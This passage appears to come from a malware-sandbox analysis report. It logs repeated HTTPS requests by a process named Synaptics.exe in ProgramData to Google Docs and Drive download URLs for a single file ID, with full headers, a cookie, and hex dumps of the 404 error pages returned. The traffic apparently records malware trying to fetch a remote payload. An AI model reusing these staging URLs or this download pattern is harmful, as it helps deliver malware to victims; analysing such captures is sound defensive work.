                                                                                            2025-01-02 19:30:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 54 4f 48 39 45 48 50 6c 4e 50 30 4d 67 61 43 67 6f 55 43 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="6TOH9EHPlNP0MgaCgoUCcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            95192.168.2.950125172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:07 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Pcdp4q-b4uXoUm0tK-KdhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            96192.168.2.950126216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC59YiJkwpSSoN_DgMY1p74RRrKNpPG42CIsSGPx0q4uNd41PRYN11qDBuxgU7ZKbGyCxjztYQw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GTHoLr2DcQnulqwmmfWh8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 5f 44 64 4b 6a 61 6e 6f 4a 47 6a 54 45 2d 30 46 56 6d 67 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="F_DdKjanoJGjTE-0FVmgMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            97192.168.2.950133172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:08 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:08 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-eeCod3xKWt8EDT_JuGDajA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            98192.168.2.950134172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:08 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:08 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-jXoG5cpWJmB7ofUqFCoKTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            99192.168.2.950135216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4FGPAjsNOT0cgQ36GABnFN4Kt5iNZ4MnNxEzA-kpg9xENbPVCnMOJ_xtuPNX0-gFnEsdWVFOo
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:09 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-nxYGPefF9XjUiNOiikIOqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:09 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:09 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 72 75 75 69 71 34 55 4d 49 5a 69 35 49 33 68 77 77 58 77 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="zruuiq4UMIZi5I3hwwXwMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:09 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            100192.168.2.950136216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7nyXUb0SbfzjgHWduGvSMJduuMXP99rPFMCsrFzQ87TDkufKe_vfeTDUv8tQnGDCSsPQbxllQ
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:09 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-arbLrr7Vv2NVz8WtzwCFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:09 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:09 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 41 57 54 53 5f 4e 44 4a 76 79 79 37 62 64 74 6c 33 6c 47 77 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="WAWTS_NDJvyy7bdtl3lGwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:09 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            101192.168.2.950139172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:10 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:10 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
